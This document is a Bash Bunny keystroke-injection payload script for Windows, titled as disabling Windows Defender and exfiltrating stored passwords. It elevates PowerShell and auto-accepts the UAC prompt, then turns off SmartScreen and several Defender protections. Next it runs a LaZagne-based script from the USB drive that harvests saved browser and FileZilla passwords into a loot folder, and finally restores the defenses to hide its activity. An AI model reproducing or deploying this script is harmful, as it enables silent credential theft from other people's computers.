91 lines
3.2 KiB
Bash
91 lines
3.2 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Disable Windows Defender and Exfil stored passwords
|
|
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
|
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
|
# Author: rafa-guillermo
|
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
|
# Version: 1.2
|
|
# Category: Credentials
|
|
# Target: Windows
|
|
# Tested On: Windows 11
|
|
# Attackmodes: HID, STORAGE
|
|
|
|
# Options
|
|
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
|
|
|
######## Set-up ########
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
ATTACKMODE HID STORAGE
|
|
DRIVE_LABEL=BashBunny
|
|
|
|
######## Make Loot Dir ########
|
|
# Setup named logs in loot directory
|
|
mkdir -p $LOOTDIR
|
|
|
|
####### Open a powershell window with elevated privileges #######
|
|
LED STAGE1
|
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
|
sleep 3 # wait for UAC prompt
|
|
QUACK ALT y
|
|
sleep 2
|
|
|
|
# Disable Windows Defender File Scan and and Real Time Protection
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
|
QUACK ENTER
|
|
sleep 1
|
|
|
|
# Run laZagne
|
|
LED STAGE2
|
|
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
|
QUACK ENTER
|
|
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
|
QUACK ENTER
|
|
QUACK STRING \& \$scriptPath
|
|
QUACK ENTER
|
|
sleep 10
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
|
|
|
|
# Re-enable Defender and Smart screen
|
|
LED CLEANUP
|
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
|
sleep 3 # wait for UAC prompt
|
|
QUACK ALT y
|
|
sleep 2
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
|
QUACK ENTER
|
|
sleep 1
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
|
|
######## FINISH ########
|
|
LED FINISH
|